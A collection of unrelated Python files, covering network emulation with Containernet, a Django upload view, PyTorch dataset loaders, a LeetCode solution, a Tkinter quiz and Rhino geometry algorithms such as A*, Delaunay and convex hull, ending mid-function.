def node_classified(name, data={}):
'''
Classify node, create inventory level overrides and/or node models
:param name: Node FQDN
:param data: Node parameters passed to the classifier
'''
ret = {'name': name,
'changes': {},
'result': True,
'comment': 'Node "{0}" is already classified.'.format(name)}
if __opts__['test']:
ret['result'] = None
ret['comment'] = 'Node "{0}" would be classified'.format(name)
return ret
classification = __salt__['architect.node_classify'](name, data)
ret['comment'] = 'Node "{0}" has been classified'.format(name)
ret['changes']['Node'] = classification
return ret
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import time
from mininet.net import Containernet
from mininet.node import Controller
from mininet.cli import CLI
from mininet.link import TCLink
from mininet.log import info, setLogLevel
from emuvim.dcemulator.net import DCNetwork
from emuvim.api.rest.rest_api_endpoint import RestApiEndpoint
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
logging.basicConfig(level=logging.INFO)
setLogLevel('info') # set Mininet loglevel
logging.getLogger('werkzeug').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.base').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.compute').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.keystone').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.nova').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.neutron').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.heat').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.heat.parser').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.glance').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.helper').setLevel(logging.DEBUG)
def create_topology():
net = DCNetwork(monitor=False, enable_learning=True)
dc1 = net.addDatacenter("dc1")
# add OpenStack-like APIs to the emulated DC
api1 = OpenstackApiEndpoint("0.0.0.0", 6001)
api1.connect_datacenter(dc1)
api1.start()
api1.connect_dc_network(net)
# add the command line interface endpoint to the emulated DC (REST API)
rapi1 = RestApiEndpoint("0.0.0.0", 5001)
rapi1.connectDCNetwork(net)
rapi1.connectDatacenter(dc1)
rapi1.start()
info('*** Adding docker containers\n')
srv = net.addDocker('srv', ip='10.0.0.203', dimage="constancegay/projet_sdci:server")
time.sleep(5)
GI = net.addDocker('GI', ip='10.0.0.202', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.202",
"loc_port": "8181",
"loc_name": "GI",
"rem_ip": "10.0.0.203",
"rem_port": "8080",
"rem_name": "srv"})
time.sleep(5)
mon = net.addDocker('mon', ip='10.0.0.204', dimage="constancegay/projet_sdci:mon")
# GFs
gf1 = net.addDocker('GF1', ip='10.0.0.201', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.201",
"loc_port": "8282",
"loc_name": "GF1",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
gf2 = net.addDocker('GF2', ip='10.0.0.208', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.208",
"loc_port": "9004",
"loc_name": "GF2",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
gf3 = net.addDocker('GF3', ip='10.0.0.212', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.212",
"loc_port": "9008",
"loc_name": "GF3",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
time.sleep(5)
# ZONE 1 devices
dev1 = net.addDocker('dev1', ip='10.0.0.205', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.205",
"loc_port": "9001",
"loc_name": "dev1",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
dev2 = net.addDocker('dev2', ip='10.0.0.206', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.206",
"loc_port": "9002",
"loc_name": "dev2",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
dev3 = net.addDocker('dev3', ip='10.0.0.207', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.207",
"loc_port": "9003",
"loc_name": "dev3",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
# ZONE 2 devices
dev4 = net.addDocker('dev4', ip='10.0.0.209', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.209",
"loc_port": "9005",
"loc_name": "dev4",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
dev5 = net.addDocker('dev5', ip='10.0.0.210', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.210",
"loc_port": "9006",
"loc_name": "dev5",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
dev6 = net.addDocker('dev6', ip='10.0.0.211', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.211",
"loc_port": "9007",
"loc_name": "dev6",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
# ZONE 3 devices
dev7 = net.addDocker('dev7', ip='10.0.0.213', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.213",
"loc_port": "9009",
"loc_name": "dev7",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
dev8 = net.addDocker('dev8', ip='10.0.0.214', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.214",
"loc_port": "9010",
"loc_name": "dev8",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
dev9 = net.addDocker('dev9', ip='10.0.0.215', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.215",
"loc_port": "9011",
"loc_name": "dev9",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
info('*** Adding switches\n')
s1 = net.addSwitch('s1')
s2 = net.addSwitch('s2')
s3 = net.addSwitch('s3')
s4 = net.addSwitch('s4')
s5 = net.addSwitch('s5')
info('*** Creating links\n')
net.addLink(s1, srv)
net.addLink(s1, GI)
net.addLink(s1, mon)
net.addLink(s2, s1)
net.addLink(s2, dc1)
net.addLink(s3, s2)
net.addLink(s4, s2)
net.addLink(s5, s2)
# ZONE 1
net.addLink(s3, gf1)
net.addLink(s3, dev1)
net.addLink(s3, dev2)
net.addLink(s3, dev3)
# ZONE 2
net.addLink(s4, gf2)
net.addLink(s4, dev4)
net.addLink(s4, dev5)
net.addLink(s4, dev6)
# ZONE 3
net.addLink(s5, gf3)
net.addLink(s5, dev7)
net.addLink(s5, dev8)
net.addLink(s5, dev9)
info('*** Starting network\n')
net.start()
info('*** Testing connectivity\n')
net.ping([srv, dev1])
info('*** Running CLI\n')
CLI(net)
info('*** Stopping network')
net.stop()
def main():
create_topology()
if __name__ == '__main__':
main()
|
# coding:utf-8
from __future__ import absolute_import, unicode_literals
__author__ = "golden"
__date__ = '2018/5/29'
import asyncio
async def loop1():
while True:
print('loop1')
await asyncio.sleep(1)
async def loop2():
while True:
print('loop2')
await asyncio.sleep(1)
loop = asyncio.get_event_loop()
asyncio.ensure_future(loop1())
asyncio.ensure_future(loop2())
loop.run_forever()
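# Note (a sketch added for illustration, not part of the original script): on
# Python 3.7+ the same two coroutines can be driven without touching the event
# loop object directly:
#
#   async def main():
#       await asyncio.gather(loop1(), loop2())
#
#   asyncio.run(main())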
|
# -*- coding: utf-8 -*-
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from uploader.myapp.models import Document
from uploader.myapp.forms import DocumentForm
def list(request):
# upload file
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES)
if form.is_valid():
newdoc = Document(docfile=request.FILES['docfile'])
newdoc.save()
# redirect to list
return HttpResponseRedirect(reverse('list'))
else:
form = DocumentForm() # empty form
# load documents
documents = Document.objects.all()
# render list page and form
return render(
request,
'list.html',
{'documents': documents, 'form': form}
)
|
import os
from NeuralGraph.processing import pickle_to_input, lst_to_out
from NeuralGraph.util import Timer
from sklearn.model_selection import train_test_split
from collections import Counter
from NeuralGraph.preprocessing import padaxis
import torch as T
def str_key(a):
ka = a.strip().split('_')[2]
return ka
def pickle_out(start=0, amount=5, test_size=0.2, random_state=0, save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle'):
input_lst = []
out = []
with Timer() as t:
dir_lst = os.listdir(save_dir)
dir_lst.sort(key=str_key)
for file in dir_lst[start:start+amount]:
file = '{}/{}'.format(save_dir, file)
input_lst += pickle_to_input(file)
# find max values
max_nodes, max_degree = [], []
for input in list(zip(*input_lst))[4]:
max_nodes.append(input.shape[0])
max_degree.append(input.shape[1])
# # print(max(max_nodes))
# # print(max(max_degree))
# print(Counter([i.numpy().tolist()[0] for i in list(zip(*input_lst))[5]]))
# tuple to list
input_lst = [list(input) for input in input_lst]
# print(type(input_lst[0][3]))
# padaxis col_3 col_4
for i in range(len(input_lst)):
input_lst[i][3] = T.from_numpy(padaxis(input_lst[i][3], max(max_nodes), axis=0))
input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_nodes), axis=0, pad_value=-1))
input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_degree), axis=1, pad_value=-1))
# print(type(input_lst[0][3]))
# max_nodes, max_degree = [], []
# for input in list(zip(*input_lst))[4]:
# max_nodes.append(input.shape[0])
# max_degree.append(input.shape[1])
# print(Counter(max_nodes))
# print(Counter(max_degree))
# split train test set
tmp_lst = [0 for _ in range(len(input_lst))]
train_set, valid_set, _, _ = train_test_split(input_lst, tmp_lst, test_size=test_size, random_state=random_state)
# print(type(train_set))
# print(type(train_set[0][0]))
train_out, valid_out = lst_to_out(train_set), lst_to_out(valid_set)
# print('\ntrain data amount: {} datas'.format(len(train_out[0])))
# print('train_out length: {}\ntrain_out ctx shape: {}'.format(len(train_out), train_out[4].shape))
# print('\nvalid data amount: {} datas'.format(len(valid_out[0])))
# print('valid_out length: {}\nvalid_out ctx shape: {}'.format(len(valid_out), valid_out[4].shape))
return train_out, valid_out
if __name__ == '__main__':
pickle_out(amount=5, save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle')
# amount=1, spent time: 0.45s, MEM usage rate: 1.1%
# amount=5, spent time: 2.13s, MEM usage rate: 4.5%
# amount=10, spent time: 9.93s, MEM usage rate: 12.5%
|
#!/usr/bin/env python
# coding=utf-8
from torch.utils.data import Dataset
import skimage.io as io
import torch
import os
class MNISTDataset(Dataset):
    # MNIST handwritten-digit dataset
def __init__(self,img_list_path,dataset_root_path="/dataset/human_attribute/",transform=None):
self.img_list_path = img_list_path
self.transform = transform
self.img_label_dic = {"img_path":[],"label":[]}
self.dataset_root_path = dataset_root_path
        with open(self.img_list_path, "r") as fr:
            for line in fr:
                strings = line.split(" ")
                strings[1] = strings[1].split("\n")[0]
                self.img_label_dic["img_path"].append(strings[0])
                self.img_label_dic["label"].append(strings[1])
def __len__(self):
if(len(self.img_label_dic["img_path"]) != len(self.img_label_dic["label"])):
return 0
return len(self.img_label_dic["img_path"])
def __getitem__(self,idx):
img_path = os.path.join(self.dataset_root_path,self.img_label_dic["img_path"][idx])
img = io.imread(img_path)
        label = int(self.img_label_dic["label"][idx])  # remember to cast the label to int here, otherwise it cannot be turned into a tensor later
if self.transform:
img = self.transform(img)
        label = torch.LongTensor([label])  # must be a LongTensor, not a FloatTensor
return img,label.squeeze()
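# Hypothetical usage sketch (the list file name and transform below are placeholders, not from the original):
# from torchvision import transforms
# dataset = MNISTDataset("train_list.txt",
#                        dataset_root_path="/dataset/human_attribute/",
#                        transform=transforms.ToTensor())
# img, label = dataset[0]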
|
# The key is the case analysis:
# first classify the stones by their value mod 3 into classes 0, 1 and 2;
# class 0 is special and its count (parity) drives the top-level case split
from typing import List
class Solution:
def stoneGameIX(self, stones: List[int]) -> bool:
s = [0, 0, 0]
for i in stones:
s[i%3] += 1
if s[0] % 2 == 0:
return s[1] > 0 and s[2] > 0
else:
return abs(s[1] - s[2]) > 2
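# Hand-traced sanity checks against this implementation (comments only, added for illustration):
# stones = [2, 1]          -> s = [0, 1, 1], s[0] even -> True
# stones = [2]             -> s = [0, 0, 1], s[0] even -> False
# stones = [5, 1, 2, 4, 3] -> s = [1, 2, 2], s[0] odd  -> |2 - 2| > 2 is False -> False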
|
#Modules
from tkinter import *
from tkinter import ttk
#----------------------------------------
class MyQuiz():
def __init__(self,root):
self.Start = Frame(root)
self.Start.grid()
self.Title = Label(self.Start, text="English Quiz", font = 30)
self.Title.grid(columnspan = 2)
self.StartQuiz = ttk.Button(self.Start, text = "Start Quiz", command = NextPage)
self.StartQuiz.grid(column = 1)
class StartQuiz():
def __init__(self,root):
self.StartQuiz = Frame(root)
Quiz.Start.grid_forget()
self.StartQuiz.grid()
#Radiobutton
self.v = StringVar(root, "1")
values = {"Level 1" : "1", "Level 2" : "2", "Level 3" : "3"}
self.ChooseLevel = Label(self.StartQuiz, text = "Choose Level", bg = "black", fg = "white", font = 30)
self.ChooseLevel.grid(columnspan = 3)
for (text, value) in values.items():
Radiobutton(self.StartQuiz, text = text, variable = self.v, value = value, indicator = 0,background = "light blue").grid()
self.NextBut = ttk.Button(self.StartQuiz, text = "Next", command = lambda: NextPages(self.v))
self.NextBut.grid(row = 3)
def NextPage():
global LevelChoosing
LevelChoosing = StartQuiz(root)
#Difficulty 1 -----------------------------------------------------------------------------------------
class Level1:
def __init__(self, root):
LevelChoosing.StartQuiz.grid_forget()
self.Level1 = Frame(root)
self.Level1.grid()
self.Title = Label(self.Level1, text = "Level 2")
self.Title.grid(columnspan = 2, row = 0,)
self.Question = Label(self.Level1)
self.Question.grid(column = 1, row = 2)
self.QEntry = Entry(self.Level1)
self.QEntry.grid(row = 3, column = 2)
def NextQuestion():
pass
self.Next_But = ttk.Button(self.Level1, text = "Next", command = NextQuestion)
self.Next_But.grid(row = 4, column = 0)
Q_Entry = self.QEntry.get()
Q_List = ["How many weeks are there in a year?","If John had 50 candies and he ate 40, what does he have?",
"Can you count how many days on your finger is in a leap year?","If Brook Book booked bookings twice",
"how many books booking did book book?","What does OOP stand for?"]
Q_Answer = ["53", "Diabetes", "No, because you only have 10 fingers", "Twice", "Object Oriented Programming"]
def Submit_Ans():
if Q_Entry == "":
self.Question.config(text = "Correct!")
self.Next_But.grid()
pass
else:
self.Question.config(text = "Bad!")
self.Next_But.grid()
pass
self.Submit_But = ttk.Button(self.Level1, text= "Submit", command = Submit_Ans)
self.Submit_But.grid(row = 4, column = 1)
lvl1 = None
def NextPages(value_chosen):
if value_chosen.get() == "1":
lvl1 = Level1(root)
else:
pass
# Runs only when this file is executed directly
if __name__ == "__main__":
    root = Tk()
    root.title("English Quiz")
    Quiz = MyQuiz(root)
    root.geometry("250x200+420+160")
    root.mainloop()
|
import Rhino as rc
import math
import random
import Rhino.Geometry as rg
import scriptcontext as sc
import rhinoscriptsyntax as rs
import util
from itertools import combinations
import clr; clr.AddReference("Grasshopper")
import Grasshopper as gh
#Computational Geometry
def PoissonDiscSampling(r, width, height):
"""Generates points within the domains
inputs:
r - Minimum distance between samples
width - highest x domain
height - highest y domain
returns:
rc.Geometry.Point3d [list]
"""
def get_cell_coords(pt):
"""Get the coordinates of the cell that pt = (x,y) falls in."""
return int(pt[0] // a), int(pt[1] // a)
def get_neighbours(coords):
"""Return the indexes of points in cells neighbouring cell at coords.
For the cell at coords = (x,y), return the indexes of points in the cells
with neighbouring coordinates illustrated below: ie those cells that could
contain points closer than r.
ooo
ooooo
ooXoo
ooooo
ooo
"""
dxdy = [(-1,-2),(0,-2),(1,-2),(-2,-1),(-1,-1),(0,-1),(1,-1),(2,-1),
(-2,0),(-1,0),(1,0),(2,0),(-2,1),(-1,1),(0,1),(1,1),(2,1),
(-1,2),(0,2),(1,2),(0,0)]
neighbours = []
for dx, dy in dxdy:
neighbour_coords = coords[0] + dx, coords[1] + dy
if not (0 <= neighbour_coords[0] < nx and
0 <= neighbour_coords[1] < ny):
# We're off the grid: no neighbours here.
continue
neighbour_cell = cells[neighbour_coords]
if neighbour_cell is not None:
# This cell is occupied: store this index of the contained point.
neighbours.append(neighbour_cell)
return neighbours
def point_valid(pt):
"""Is pt a valid point to emit as a sample?
It must be no closer than r from any other point: check the cells in its
immediate neighbourhood.
"""
cell_coords = get_cell_coords(pt)
for idx in get_neighbours(cell_coords):
nearby_pt = samples[idx]
            # Squared distance between our candidate point, pt, and this nearby_pt.
distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2
if distance2 < r**2:
# The points are too close, so pt is not a candidate.
return False
# All points tested: if we're here, pt is valid
return True
def get_point(k, refpt):
"""Try to find a candidate point relative to refpt to emit in the sample.
We draw up to k points from the annulus of inner radius r, outer radius 2r
around the reference point, refpt. If none of them are suitable (because
they're too close to existing points in the sample), return False.
Otherwise, return the pt.
"""
i = 0
while i < k:
rho, theta = random.uniform(r, 2*r), random.uniform(0, 2*math.pi)
pt = refpt[0] + rho*math.cos(theta), refpt[1] + rho*math.sin(theta)
if not (0 <= pt[0] < width and 0 <= pt[1] < height):
# This point falls outside the domain, so try again.
continue
if point_valid(pt):
return pt
i += 1
# We failed to find a suitable point in the vicinity of refpt.
return False
# Choose up to k points around each reference point as candidates for a new
# sample point
k = 30
# Cell side length
a = r/math.sqrt(2)
# Number of cells in the x- and y-directions of the grid
nx, ny = int(width / a) + 1, int(height / a) + 1
# A list of coordinates in the grid of cells
coords_list = [(ix, iy) for ix in range(nx) for iy in range(ny)]
    # Initialize the dictionary of cells: each key is a cell's coordinates, the
# corresponding value is the index of that cell's point's coordinates in the
# samples list (or None if the cell is empty).
cells = {coords: None for coords in coords_list}
# Pick a random point to start with.
pt = (random.uniform(0, width), random.uniform(0, height))
samples = [pt]
# Our first sample is indexed at 0 in the samples list...
cells[get_cell_coords(pt)] = 0
# ... and it is active, in the sense that we're going to look for more points
# in its neighbourhood.
active = [0]
nsamples = 1
# As long as there are points in the active list, keep trying to find samples.
while active:
# choose a random "reference" point from the active list.
idx = random.choice(active)
refpt = samples[idx]
# Try to pick a new point relative to the reference point.
pt = get_point(k, refpt)
if pt:
# Point pt is valid: add it to the samples list and mark it as active
samples.append(pt)
nsamples += 1
active.append(len(samples)-1)
cells[get_cell_coords(pt)] = len(samples) - 1
else:
# We had to give up looking for valid points near refpt, so remove it
# from the list of "active" points.
active.remove(idx)
rcPts = []
for sample in samples:
rcPts.append(rc.Geometry.Point3d(sample[0], sample[1], 0))
return rcPts
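# Example call (illustrative values, not from the original): sample points at
# least 2.0 units apart inside a 50 x 30 domain and bake them into the document.
# pts = PoissonDiscSampling(2.0, 50, 30)
# for pt in pts:
#     sc.doc.Objects.AddPoint(pt)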
class AStar():
"""
Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes.
example:
searchNetwork = AStar(srfs)
start = searchNetwork.GetNodeClosestToPt(rg.Point3d(0,0,0))
end = searchNetwork.GetNodeClosestToPt(rg.Point3d(50,50,0))
result, path = searchNetwork.AStarPathFinder(start, end)
"""
def __init__(self, srfs):
"""
parameter:
srfs [list]: triangular srfs, not joined
"""
self.nodes = []
self.start = None
self.end = None
#Create Nodes
for srf in srfs:
srfPts = srf.Brep.Vertices
thisSrfNodes = []
for srfPt in srfPts:
pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0)
node0 = None
for node in self.nodes:
if node.pos == pt:
node0 = node
break
if node0 is None:
node0 = self.Node(pt)
thisSrfNodes.append(node0)
#Setup node neighbors
for thisSrfNode in thisSrfNodes:
for otherNode in thisSrfNodes:
if thisSrfNode is otherNode: continue
if otherNode not in thisSrfNode.neighbors:
thisSrfNode.neighbors.append(otherNode)
if thisSrfNode not in self.nodes:
self.nodes.append(thisSrfNode)
def GetNodeClosestToPt(self, pt):
"""
parameters:
pt (point): point to find node closest to
returns:
node: node closest to pt
"""
closestDist = None
closestNode = None
for node in self.nodes:
d = rs.Distance(pt, node.pos)
if d < closestDist or closestDist is None:
closestDist = d
closestNode = node
return closestNode
def AStarPathFinder(self, start, end):
"""
        parameters:
start (node):
end (node):
returns:
Bool (success or failure)
list (nodes visited) (use the .pos to get the rhino point)
"""
openSet = [start]
closedSet = []
path = []
searching = True
while searching:
if sc.escape_test(True): return
if len(openSet) > 0:
#Choose tile with lowest f score
lowestTile = openSet[0]
for tile in openSet:
if tile is lowestTile: continue
if tile.f < lowestTile.f or lowestTile is None:
lowestTile = tile
current = lowestTile
path = []
temp = current
path.append(temp)
while temp.previous:
path.append(temp.previous)
temp = temp.previous
#Check if at the end
if current is end:
searching = False
break
#Move current tile from open to closed set
openSet.remove(current)
closedSet.append(current)
#Check all the neighbors
for neighbor in current.neighbors:
#if neighbor.type == 0: continue #Use this if nodes are blocked
if neighbor not in closedSet:
tempG = current.g + rs.Distance(current.pos, neighbor.pos)
#Is this a better path?
if neighbor not in openSet:
openSet.append(neighbor)
elif tempG >= neighbor.g:
#It is not a better path
continue
neighbor.previous = current
neighbor.g = tempG
                        neighbor.h = rs.Distance(neighbor.pos, end.pos)
neighbor.f = neighbor.g + neighbor.h
else:
#print "No Solution"
return False, None
return True, path
class Node():
def __init__(self, pt):
self.pos = pt
self.neighbors = []
self.previous = None
self.f = 0
self.g = 0
self.h = 0
self.type = None
class AStarMesh():
"""
Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes.
example:
searchNetwork = geo.AStarMesh(mesh, sourceIndex, targetIndex)
result, path = searchNetwork.AStarPathFinder()
"""
    def __init__(self, mesh, start, end):
        """
        parameters:
            mesh (Mesh): mesh whose vertices become the search nodes
            start (int): index of the starting vertex in the mesh
            end (int): index of the target vertex in the mesh
        """
self.nodes = []
for i, v in enumerate(mesh.Vertices):
self.nodes.append(self.Node(v))
for i, v in enumerate(mesh.Vertices):
indices = mesh.Vertices.GetConnectedVertices(i)
for index in indices:
self.nodes[i].neighbors.append(self.nodes[index])
self.start = self.nodes[start]
self.end = self.nodes[end]
if False:
#Create Nodes
for srf in srfs:
srfPts = srf.Brep.Vertices
thisSrfNodes = []
for srfPt in srfPts:
pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0)
node0 = None
for node in self.nodes:
if node.pos == pt:
node0 = node
break
if node0 is None:
node0 = self.Node(pt)
thisSrfNodes.append(node0)
#Setup node neighbors
for thisSrfNode in thisSrfNodes:
for otherNode in thisSrfNodes:
if thisSrfNode is otherNode: continue
if otherNode not in thisSrfNode.neighbors:
thisSrfNode.neighbors.append(otherNode)
if thisSrfNode not in self.nodes:
self.nodes.append(thisSrfNode)
def GetNodeClosestToPt(self, pt):
"""
parameters:
pt (point): point to find node closest to
returns:
node: node closest to pt
"""
closestDist = None
closestNode = None
for node in self.nodes:
d = rs.Distance(pt, node.pos)
if d < closestDist or closestDist is None:
closestDist = d
closestNode = node
return closestNode
def AStarPathFinder(self):
"""
paramters:
start (node):
end (node):
returns:
Bool (success or failure)
list (nodes visited) (use the .pos to get the rhino point)
"""
openSet = [self.start]
closedSet = []
path = []
searching = True
while searching:
if sc.escape_test(True): return
if len(openSet) > 0:
#Choose tile with lowest f score
lowestTile = openSet[0]
for tile in openSet:
if tile is lowestTile: continue
if tile.f < lowestTile.f or lowestTile is None:
lowestTile = tile
current = lowestTile
path = []
temp = current
path.append(temp)
while temp.previous:
path.append(temp.previous)
temp = temp.previous
#Check if at the end
if current is self.end:
searching = False
break
#Move current tile from open to closed set
openSet.remove(current)
closedSet.append(current)
#Check all the neighbors
for neighbor in current.neighbors:
#if neighbor.type == 0: continue #Use this if nodes are blocked
if neighbor not in closedSet:
tempG = current.g + rs.Distance(current.pos, neighbor.pos)
#Is this a better path?
if neighbor not in openSet:
openSet.append(neighbor)
elif tempG >= neighbor.g:
#It is not a better path
continue
neighbor.previous = current
neighbor.g = tempG
                        neighbor.h = rs.Distance(neighbor.pos, self.end.pos)
neighbor.f = neighbor.g + neighbor.h
else:
#print "No Solution"
return False, None
return True, path
class Node():
def __init__(self, pt):
self.pos = rg.Point3d(pt)
self.neighbors = []
self.previous = None
self.f = 0
self.g = 0
self.h = 0
self.type = None
def Delaunay2d(pts):
"""
Delaunay Triangulation
parameters:
pts [list]
return:
PolylineCurve [list]: in counter-clockwise orientation
"""
triangles = []
set = list(combinations(pts,3))
for tuple in set:
c1 = tuple[0]
c2 = tuple[1]
c3 = tuple[2]
if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0:
circle = rg.Circle(c1,c2,c3)
center = circle.Center
circle = circle.ToNurbsCurve()
delaunay = 0
for point in pts:
if circle.Contains(point) == rg.PointContainment.Inside:
delaunay = 1
continue
if delaunay == 0:
crv = rg.PolylineCurve([c1,c2,c3,c1])
if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise:
crv.Reverse()
triangles.append(crv)
return triangles
def Delaunay2dPts(pts):
"""
Delaunay Triangulation
parameters:
pts [list]
return:
Pts [list]: in counter-clockwise orientation
"""
triangles = []
set = list(combinations(pts,3))
for tuple in set:
c1 = tuple[0]
c2 = tuple[1]
c3 = tuple[2]
if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0:
circle = rg.Circle(c1,c2,c3)
circle = circle.ToNurbsCurve()
delaunay = 0
for point in pts:
if circle.Contains(point) == rg.PointContainment.Inside:
delaunay = 1
continue
if delaunay == 0:
if False:
c1t = circle.ClosestPoint(c1)[1]
c2t = circle.ClosestPoint(c2)[1]
c3t = circle.ClosestPoint(c3)[1]
group = [[c1t, c1], [c2t, c2], [c3t, c3]]
group.sort()
triangles.append([group[0][1],group[1][1],group[2][1]])
triangles.append([c1, c2, c3])
return triangles
def DelaunayMesh(pts, plane):
"""
Delaunay Triangulation to a mesh
parameters:
pts [list]
plane: Plane to project to
return:
Mesh
"""
mesh = rg.Mesh()
ptsList = rc.Collections.Point3dList(pts)
#Transform to worldXY
xform = rg.Transform.PlaneToPlane(plane, rg.Plane.WorldXY)
ptsList.Transform(xform)
#Add pts to mesh
for pt in ptsList:
mesh.Vertices.Add(pt)
#Project to plane
ptsList.SetAllZ(0)
#Find delaunay
allPts = Delaunay2dPts(ptsList)
#Return to correct Z
returnToZPts = []
for tri in allPts:
mesh.Faces.AddFace(ptsList.ClosestIndex(tri[0]), ptsList.ClosestIndex(tri[1]), ptsList.ClosestIndex(tri[2]))
#Return to original space
returnXform = rg.Transform.PlaneToPlane(rg.Plane.WorldXY, plane)
mesh.Transform(returnXform)
mesh.UnifyNormals()
mesh.RebuildNormals()
return mesh
def Voronoi2D(pts, bbCorners = None):
"""
Calculates 2d voronoi using Grasshopper code
parameters:
pts (rg.Point3d)[list]
bbCorners (rg.Point3d)[list]: 4 points for boundary
returns:
rg.PolylineCurve [list]: Closed region
"""
if bbCorners is None:
# Create a boundingbox and get its corners
bb = rc.Geometry.BoundingBox(pts)
d = bb.Diagonal
dl = d.Length
f = dl/15
bb.Inflate(f,f,f)
bbCorners = bb.GetCorners()
# Create a list of outline nodes using the BB
outline = gh.Kernel.Geometry.Node2List()
for p in bbCorners:
n = gh.Kernel.Geometry.Node2(p.X,p.Y)
outline.Append(n)
# Create a list of nodes
nodes = gh.Kernel.Geometry.Node2List()
for p in pts:
n = gh.Kernel.Geometry.Node2(p.X,p.Y)
nodes.Append(n)
# Calculate the delaunay triangulation
delaunay = gh.Kernel.Geometry.Delaunay.Solver.Solve_Connectivity(nodes,0.1,False)
# Calculate the voronoi diagram
voronoi = gh.Kernel.Geometry.Voronoi.Solver.Solve_Connectivity(nodes,delaunay,outline)
# Get polylines from the voronoi cells and return them to GH
polylines = []
for c in voronoi:
pl = c.ToPolyline()
polylines.append(pl.ToPolylineCurve())
return polylines
class ConvexHull():
"""
Code modified from https://startupnextdoor.com/computing-convex-hull-in-python/
initialize then use get_hull_points or get_polyline
    parameters:
allPts (pts [point]): list of pts
"""
def __init__(self, allPts):
self._hull_points = []
self._points = allPts
self.compute_hull()
def _get_orientation(self, origin, p1, p2):
'''
Returns the orientation of the Point p1 with regards to Point p2 using origin.
Negative if p1 is clockwise of p2.
:param p1:
:param p2:
:return: integer
'''
difference = (
((p2.X - origin.X) * (p1.Y - origin.Y))
- ((p1.X - origin.X) * (p2.Y - origin.Y))
)
return difference
def compute_hull(self):
'''
Computes the points that make up the convex hull.
:return:
'''
points = self._points
# get leftmost point
start = points[0]
min_x = start.X
for p in points[1:]:
if p.X < min_x:
min_x = p.X
start = p
point = start
self._hull_points.append(start)
far_point = None
while far_point is not start:
# get the first point (initial max) to use to compare with others
p1 = None
for p in points:
if p is point:
continue
else:
p1 = p
break
far_point = p1
for p2 in points:
# ensure we aren't comparing to self or pivot point
if p2 is point or p2 is p1:
continue
else:
direction = self._get_orientation(point, far_point, p2)
if direction > 0:
far_point = p2
self._hull_points.append(far_point)
point = far_point
def get_hull_points(self):
"""
returns:
pts [list]
"""
if self._points and not self._hull_points:
self.compute_hull()
return self._hull_points
def get_polyline(self):
"""
returns:
